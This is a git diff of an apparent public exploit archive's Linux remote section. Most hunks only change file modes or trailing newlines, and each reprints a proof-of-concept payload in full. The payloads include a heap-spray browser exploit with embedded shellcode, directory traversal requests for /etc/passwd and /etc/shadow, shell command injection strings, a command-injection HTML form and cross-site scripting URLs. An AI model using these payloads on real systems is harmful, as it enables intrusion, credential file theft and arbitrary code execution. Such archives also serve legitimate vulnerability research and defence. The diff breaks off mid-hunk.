b/platforms/linux/remote/33315.java old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33364.txt b/platforms/linux/remote/33364.txt old mode 100755 new mode 100644 index f5dcb3de5..eb56ca99b --- a/platforms/linux/remote/33364.txt +++ b/platforms/linux/remote/33364.txt @@ -10,4 +10,4 @@ This issue affects KDE KDELibs 4.3.3; other versions may also be affected. <script> var a=0.<?php echo str_repeat("1",296450); ?>; -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/linux/remote/33388.f b/platforms/linux/remote/33388.f old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33402.txt b/platforms/linux/remote/33402.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33535.txt b/platforms/linux/remote/33535.txt old mode 100755 new mode 100644 index c6cc842d5..da0108738 --- a/platforms/linux/remote/33535.txt +++ b/platforms/linux/remote/33535.txt @@ -12,4 +12,4 @@ The following example commands are available: stap-client \; ... stap-client -; ... stap-client -D 'asdf ; ls /etc' ... -stap-client -e 'script' -D 'asdf ; \; ' \ No newline at end of file +stap-client -e 'script' -D 'asdf ; \; ' \ No newline at end of file diff --git a/platforms/linux/remote/33599.txt b/platforms/linux/remote/33599.txt old mode 100755 new mode 100644 index 9ec27bad2..f843691f4 --- a/platforms/linux/remote/33599.txt +++ b/platforms/linux/remote/33599.txt @@ -80,4 +80,4 @@ static int cmd_symlink(void) } // Cheers, -// kcope \ No newline at end of file +// kcope \ No newline at end of file diff --git a/platforms/linux/remote/33620.txt b/platforms/linux/remote/33620.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33622.txt b/platforms/linux/remote/33622.txt old mode 100755 new mode 100644 index 2fdf8db16..3d8485009 --- a/platforms/linux/remote/33622.txt +++ b/platforms/linux/remote/33622.txt @@ -9,4 +9,4 @@ Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, i An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible. -https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd \ No newline at end of file +https://www.example.com/courier/1000@1276123d688676a09e0100b4f54b239c/web_client_user_guide.html?lang=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/33752.html b/platforms/linux/remote/33752.html old mode 100755 new mode 100644 index 052087838..8a4b2e5aa --- a/platforms/linux/remote/33752.html +++ b/platforms/linux/remote/33752.html @@ -6,4 +6,4 @@ Successful exploits may allow the attacker to execute arbitrary code in the cont This issue was previously documented in BID 38671 (Apple Safari Prior to 4.0.5 Multiple Security Vulnerabilities) but has been given its own record to better document it. -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML> \ No newline at end of file +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <HTML lang="en"> <HEAD> <script type="text/javascript">//<![CDATA[ function fuzz_load(){ spray2(); e=document.getElementsByTagName("FORM")[0]; e.previousSibling.dir="rtl"; //e.previousSibling.style="font-size:111px;"; setTimeout('fuzz_timer_0();',1); } function spray2(){ var shellcode ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090"); do { spray += spray; } while(spray.length < 0xc0000); memory = new Array(); for(i = 0; i < 50; i++) memory[i] = spray + shellcode; } function calc(){ var s0 ="\uc931\ue983\ud9dd\ud9ee\u2474\u5bf4\u7381\u6f13\ub102\u830e\ufceb\uf4e2\uea93\u0ef5\u026f\u4b3a\u8953\u0bcd\u0317\u855e\u1a20\u513a\u034f\u475a\u36e4\u0f3a\u3381\u9771\u86c3\u7a71\uc368\u037b\uc06e\ufa5a\u5654\u0a95\ue71a\u513a\u034b\u685a\u0ee4\u85fa\u1e30\ue5b0\u1ee4\u0f3a\u8b84\u2aed\uc16b\uce80\u890b\u3ef1\uc2ea\u02c9\u42e4\u85bd\u1e1f\u851c\u0a07\u075a\u82e4\u0e01\u026f\u663a\u5d53\uf880\u540f\uf638\uc2ec\u5eca\u7c07\uec69\u6a1c\uf029\u0ce5\uf1e6\u6188\u62d0\u2c0c\u76d4\u020a\u0eb1" ; var addr1= unescape("%u9090%u9090"); var addr2= "\uc5c6\uc7c9"; var addr3="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr4="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr5="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; var addr6="\u543d\u4044\u3a7a\u4361\u5977\u696c\u2566\u4151\u5371\u275e\u4c48\u5252\u5b38\u4c44\u742d\u5827\u6a7a\u6644\u2647\u4e4a\u6565\u6825\u332e\u232d\u7456\u406d\u6630\u6841\u524c\u2955\u242b\u3c21\u4628\u3e50\u687d\u7e58\u313d\u6653\u3e2c\u3468\u2d42\u464a\u7361\u5430\u3051"; } function fuzz_timer_0(){ e=document.getElementsByTagName("NOBR")[0]; e.innerHTML=''; calc(); document.lastChild.normalize(); } //]]> </script> <code>1111 <AREA>13333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 <FORM > <NOBR /><BIG /> </FORM> </AREA> </code> </A> </HEAD> <BODY dir="rtl" onload="fuzz_load();"> </BODY> </HTML> \ No newline at end of file diff --git a/platforms/linux/remote/33783.txt b/platforms/linux/remote/33783.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33798.html b/platforms/linux/remote/33798.html old mode 100755 new mode 100644 index 1a0d3ec7b..bc5084a2b --- a/platforms/linux/remote/33798.html +++ b/platforms/linux/remote/33798.html @@ -10,4 +10,4 @@ Mozilla Firefox 3.6 is vulnerable. NOTE: This issue was previously covered in BID 38918 (Mozilla Firefox Thunderbird and Seamonkey MFSA 2010-09 through -15 Multiple Vulnerabilities) but has been assigned its own record to better document it. -<img src="file:///dev/tty"> \ No newline at end of file +<img src="file:///dev/tty"> \ No newline at end of file diff --git a/platforms/linux/remote/33826.txt b/platforms/linux/remote/33826.txt old mode 100755 new mode 100644 index 302ea8ed2..af8750e24 --- a/platforms/linux/remote/33826.txt +++ b/platforms/linux/remote/33826.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue in conjunction with other latent vulnerabilit Versions prior to TCPDF 4.9.006 are vulnerable. -<tcpdf method="Rect" params=");echo `id`;die(" /> \ No newline at end of file +<tcpdf method="Rect" params=");echo `id`;die(" /> \ No newline at end of file diff --git a/platforms/linux/remote/33855.txt b/platforms/linux/remote/33855.txt old mode 100755 new mode 100644 index 5b0364381..0039587a8 --- a/platforms/linux/remote/33855.txt +++ b/platforms/linux/remote/33855.txt @@ -10,4 +10,4 @@ The following proof-of-concept command is available: % kinit -R -We currently are unaware of any exploits that result in code-execution. \ No newline at end of file +We currently are unaware of any exploits that result in code-execution. \ No newline at end of file diff --git a/platforms/linux/remote/3389.c b/platforms/linux/remote/3389.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/33949.txt b/platforms/linux/remote/33949.txt old mode 100755 new mode 100644 index cb53c381a..69ecd0cd4 --- a/platforms/linux/remote/33949.txt +++ b/platforms/linux/remote/33949.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of an Versions prior to PCRE 8.02 are vulnerable; applications which use the PCRE library may also be affected. -perl -e 'print "/","("x819, ")"x819, "/"' | pcretest \ No newline at end of file +perl -e 'print "/","("x819, ")"x819, "/"' | pcretest \ No newline at end of file diff --git a/platforms/linux/remote/340.c b/platforms/linux/remote/340.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34152.txt b/platforms/linux/remote/34152.txt old mode 100755 new mode 100644 index 0752fe9c4..4cd9746e3 --- a/platforms/linux/remote/34152.txt +++ b/platforms/linux/remote/34152.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue to obtain sensitive information that may NOTE: This issue was previously covered in BID 40871 (Apple Mac OS X Prior to 10.6.4 Multiple Security Vulnerabilities), but has been given its own record to better document it. -http://www.example.com:631/admin?URL=/admin/&OP=% \ No newline at end of file +http://www.example.com:631/admin?URL=/admin/&OP=% \ No newline at end of file diff --git a/platforms/linux/remote/34192.txt b/platforms/linux/remote/34192.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34201.txt b/platforms/linux/remote/34201.txt old mode 100755 new mode 100644 index 2bff93850..aebb3cb4c --- a/platforms/linux/remote/34201.txt +++ b/platforms/linux/remote/34201.txt @@ -4,4 +4,4 @@ feh is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. -feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg' \ No newline at end of file +feh --wget-timestamp 'http://www.example.com/stuff/bar`touch lol_hax`.jpg' \ No newline at end of file diff --git a/platforms/linux/remote/34358.txt b/platforms/linux/remote/34358.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34385.txt b/platforms/linux/remote/34385.txt old mode 100755 new mode 100644 index 3c1aea138..72afc61f0 --- a/platforms/linux/remote/34385.txt +++ b/platforms/linux/remote/34385.txt @@ -7,4 +7,4 @@ Exploiting this issue can allow an attacker to execute arbitrary commands within KVIrc 4.0.0 is vulnerable; other versions may also be affected. /ctcp nickname DCC GET\rQUIT\r -/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r \ No newline at end of file +/ctcp nickname DCC GET\rPRIVMSG\40#channel\40:epic\40fail\r \ No newline at end of file diff --git a/platforms/linux/remote/34426.txt b/platforms/linux/remote/34426.txt old mode 100755 new mode 100644 index fcbd6c064..080e145b9 --- a/platforms/linux/remote/34426.txt +++ b/platforms/linux/remote/34426.txt @@ -6,4 +6,4 @@ To exploit this issue, attackers must entice an unsuspecting user to click on a Exploiting this issue would permit remote attackers to inject and execute commands with the privileges of a user running the application. -<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Test</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <p><a href=""$(cat /etc/passwd |zenity --text-info)"">click me with middle button</a><br />this will open a zenity dialog with your passwd file. I shouldn't be able to do this.</p> </body> </html> \ No newline at end of file +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Test</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> </head> <body> <p><a href=""$(cat /etc/passwd |zenity --text-info)"">click me with middle button</a><br />this will open a zenity dialog with your passwd file. I shouldn't be able to do this.</p> </body> </html> \ No newline at end of file diff --git a/platforms/linux/remote/34431.html b/platforms/linux/remote/34431.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34507.txt b/platforms/linux/remote/34507.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/347.c b/platforms/linux/remote/347.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34765.txt b/platforms/linux/remote/34765.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34766.php b/platforms/linux/remote/34766.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/348.c b/platforms/linux/remote/348.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34879.txt b/platforms/linux/remote/34879.txt old mode 100755 new mode 100644 index bc331fbb6..b812f1948 --- a/platforms/linux/remote/34879.txt +++ b/platforms/linux/remote/34879.txt @@ -100,7 +100,4 @@ Mon Sep 29 20:58:04 2014 10.10.0.56:1194 SIGTERM[soft,delayed-exit] received, cl nobody@debian:/etc/openvpn$ id id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) -#shoutouts to Fredrik Str�mberg for the post he made on ycombinator - - - \ No newline at end of file +#shoutouts to Fredrik Str�mberg for the post he made on ycombinator \ No newline at end of file diff --git a/platforms/linux/remote/34881.html b/platforms/linux/remote/34881.html old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/34932.html b/platforms/linux/remote/34932.html old mode 100755 new mode 100644 index 015e18310..6d8d70b6d --- a/platforms/linux/remote/34932.html +++ b/platforms/linux/remote/34932.html @@ -6,4 +6,4 @@ Successful attacks may allow an attacker to execute arbitrary commands on the ap NitroView ESM 8.4.0a is affected; other versions may also be vulnerable. -<html> <pre> [*] Tested on v8.4.0a "NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux" [*] No authentication required [*] "ESSPMDebug=1" in "/usr/local/ess/CPConsoleServer.cfg" required </pre> <form action="https://x.x.x.x/ess"; method="POST"> <input type="text" name="Request" value="A';c='uname:-a';IFS=:;$c>>/tmp/test;'" <input type="hidden" name="debug" value="1"> <input type="submit" value="Oops()"> </form> </html> \ No newline at end of file +<html> <pre> [*] Tested on v8.4.0a "NitroSecurity 2.6.22.19-24nssmp64 GNU/Linux" [*] No authentication required [*] "ESSPMDebug=1" in "/usr/local/ess/CPConsoleServer.cfg" required </pre> <form action="https://x.x.x.x/ess"; method="POST"> <input type="text" name="Request" value="A';c='uname:-a';IFS=:;$c>>/tmp/test;'" <input type="hidden" name="debug" value="1"> <input type="submit" value="Oops()"> </form> </html> \ No newline at end of file diff --git a/platforms/linux/remote/34998.txt b/platforms/linux/remote/34998.txt old mode 100755 new mode 100644 index f2734c0ce..afe9065c0 --- a/platforms/linux/remote/34998.txt +++ b/platforms/linux/remote/34998.txt @@ -4,4 +4,4 @@ Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabili An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0) \ No newline at end of file +http://localhost:[REPLACE]/help/index.jsp?'onload='alert(0) \ No newline at end of file diff --git a/platforms/linux/remote/34999.txt b/platforms/linux/remote/34999.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35011.txt b/platforms/linux/remote/35011.txt old mode 100755 new mode 100644 index e3d3f8812..d4303edec --- a/platforms/linux/remote/35011.txt +++ b/platforms/linux/remote/35011.txt @@ -4,4 +4,4 @@ Apache Tomcat is prone to multiple cross-site scripting vulnerabilities because An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http:/www.example.com/html/sessions?path=/&sort=[xss] \ No newline at end of file +http:/www.example.com/html/sessions?path=/&sort=[xss] \ No newline at end of file diff --git a/platforms/linux/remote/35018.c b/platforms/linux/remote/35018.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35095.txt b/platforms/linux/remote/35095.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35132.txt b/platforms/linux/remote/35132.txt old mode 100755 new mode 100644 index 9a6bf4d27..a034b2ca7 --- a/platforms/linux/remote/35132.txt +++ b/platforms/linux/remote/35132.txt @@ -5,4 +5,4 @@ Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vu Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application. http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/usr/awc/www/users%22%26 -http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26 \ No newline at end of file +http://www.example.com/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26ls%20%22/usr/awc/www/cgi-bin/%22%26 \ No newline at end of file diff --git a/platforms/linux/remote/35148.txt b/platforms/linux/remote/35148.txt old mode 100755 new mode 100644 index d63c83559..10cce0b1f --- a/platforms/linux/remote/35148.txt +++ b/platforms/linux/remote/35148.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to view arbitrary local files withi IBM Tivoli Access Manager for e-business 6.1.1 is vulnerable. -http://www.example.com/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd \ No newline at end of file +http://www.example.com/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/35232.txt b/platforms/linux/remote/35232.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35314.txt b/platforms/linux/remote/35314.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35386.txt b/platforms/linux/remote/35386.txt old mode 100755 new mode 100644 index 1a9d334de..d0f128d1c --- a/platforms/linux/remote/35386.txt +++ b/platforms/linux/remote/35386.txt @@ -4,4 +4,4 @@ Logwatch is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. -% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â?? \ No newline at end of file +% echo "fake" > â??/var/log/httpd/fakee;who;access_log.2â?? \ No newline at end of file diff --git a/platforms/linux/remote/3554.pm b/platforms/linux/remote/3554.pm old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35554.txt b/platforms/linux/remote/35554.txt old mode 100755 new mode 100644 index d31cef11a..4eda367a9 --- a/platforms/linux/remote/35554.txt +++ b/platforms/linux/remote/35554.txt @@ -8,4 +8,4 @@ The following example input is available: > perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))' -> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))' \ No newline at end of file +> perl -Te 'use Scalar::Util qw(tainted); $t=$0; $u=lc($t); printf("%d,%d\n",tainted($t),tainted($u))' \ No newline at end of file diff --git a/platforms/linux/remote/35606.txt b/platforms/linux/remote/35606.txt old mode 100755 new mode 100644 index f348f50de..4538433f4 --- a/platforms/linux/remote/35606.txt +++ b/platforms/linux/remote/35606.txt @@ -8,4 +8,4 @@ MIT Kerberos 5 1.7 and later are vulnerable. NOTE (April 13, 2011): This BID was originally titled 'MIT Kerberos kadmind Version String Processing Remote Denial Of Service Vulnerability', but has been renamed to better reflect the nature of the issue. -# nmap -n -sV krb01 \ No newline at end of file +# nmap -n -sV krb01 \ No newline at end of file diff --git a/platforms/linux/remote/35644.txt b/platforms/linux/remote/35644.txt old mode 100755 new mode 100644 index 255838138..299b79c69 --- a/platforms/linux/remote/35644.txt +++ b/platforms/linux/remote/35644.txt @@ -7,4 +7,4 @@ Exploiting the issues can allow an attacker to obtain sensitive information that Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd -http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/35784.php b/platforms/linux/remote/35784.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35785.txt b/platforms/linux/remote/35785.txt old mode 100755 new mode 100644 index c2077f4f7..a50104208 --- a/platforms/linux/remote/35785.txt +++ b/platforms/linux/remote/35785.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary shell commands in the co Versions prior to klibc 1.5.22 are vulnerable. -DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)" \ No newline at end of file +DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)" \ No newline at end of file diff --git a/platforms/linux/remote/35799.txt b/platforms/linux/remote/35799.txt old mode 100755 new mode 100644 index ebdaade67..33500b002 --- a/platforms/linux/remote/35799.txt +++ b/platforms/linux/remote/35799.txt @@ -6,4 +6,4 @@ A remote attacker could exploit this vulnerability using directory-traversal str Vordel Gateway 6.0.3 is vulnerable; other versions may also be affected. -http://www.example.com:8090/manager/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow \ No newline at end of file +http://www.example.com:8090/manager/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow \ No newline at end of file diff --git a/platforms/linux/remote/35801.txt b/platforms/linux/remote/35801.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/35810.txt b/platforms/linux/remote/35810.txt old mode 100755 new mode 100644 index 3cf5e61dd..aca56e930 --- a/platforms/linux/remote/35810.txt +++ b/platforms/linux/remote/35810.txt @@ -11,4 +11,4 @@ An attacker can exploit these issues by enticing an unsuspecting user into openi A successful attack can allow attacker-supplied code to run in the context of the application using the vulnerable library or can cause a denial-of-service condition. -//@*/preceding::node()/ancestor::node()/ancestor::foo['foo'] \ No newline at end of file +//@*/preceding::node()/ancestor::node()/ancestor::foo['foo'] \ No newline at end of file diff --git a/platforms/linux/remote/359.c b/platforms/linux/remote/359.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/36199.txt b/platforms/linux/remote/36199.txt old mode 100755 new mode 100644 index 4f80cebc8..7a053cbe3 --- a/platforms/linux/remote/36199.txt +++ b/platforms/linux/remote/36199.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue to run arbitrary code in the context of Digest versions prior to 1.17 are affected. -Digest->new("::MD5lprint 'ownaide\n';exit(1);"); \ No newline at end of file +Digest->new("::MD5lprint 'ownaide\n';exit(1);"); \ No newline at end of file diff --git a/platforms/linux/remote/36352.txt b/platforms/linux/remote/36352.txt old mode 100755 new mode 100644 index 962b34639..fd75092a1 --- a/platforms/linux/remote/36352.txt +++ b/platforms/linux/remote/36352.txt @@ -7,4 +7,4 @@ Successful exploits will allow attackers to bypass certain security restrictions The following example patterns are available: RewriteRule ^(.*) http://www.example.com$1 -ProxyPassMatch ^(.*) http://www.example.com$1 \ No newline at end of file +ProxyPassMatch ^(.*) http://www.example.com$1 \ No newline at end of file diff --git a/platforms/linux/remote/36370.txt b/platforms/linux/remote/36370.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/36562.txt b/platforms/linux/remote/36562.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/36663.txt b/platforms/linux/remote/36663.txt old mode 100755 new mode 100644 index 4f3dbf10b..9a644a119 --- a/platforms/linux/remote/36663.txt +++ b/platforms/linux/remote/36663.txt @@ -5,4 +5,4 @@ Apache HTTP Server is prone to a security-bypass vulnerability. Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications. RewriteRule ^(.*) http://www.example.com$1 -ProxyPassMatch ^(.*) http://www.example.com$1 \ No newline at end of file +ProxyPassMatch ^(.*) http://www.example.com$1 \ No newline at end of file diff --git a/platforms/linux/remote/36742.txt b/platforms/linux/remote/36742.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3698.txt b/platforms/linux/remote/3698.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/37007.txt b/platforms/linux/remote/37007.txt old mode 100755 new mode 100644 index efb52435b..40ea2bb8f --- a/platforms/linux/remote/37007.txt +++ b/platforms/linux/remote/37007.txt @@ -10,4 +10,4 @@ https://www.example.com/compose.php?func=renameattach&unique=/..././..././..././ https://www.example.com/compose.php?func=renameattach&unique=1.txt%00&Attachment[]=/../../../../../../../../../etc/passwd -https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html \ No newline at end of file +https://www.example.com/mime.php?file=%0A/../../../../../../../../../etc/passwd&name=positive.html \ No newline at end of file diff --git a/platforms/linux/remote/372.c b/platforms/linux/remote/372.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3724.c b/platforms/linux/remote/3724.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/373.c b/platforms/linux/remote/373.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/37576.cpp b/platforms/linux/remote/37576.cpp old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/3787.c b/platforms/linux/remote/3787.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/37889.txt b/platforms/linux/remote/37889.txt old mode 100755 new mode 100644 index 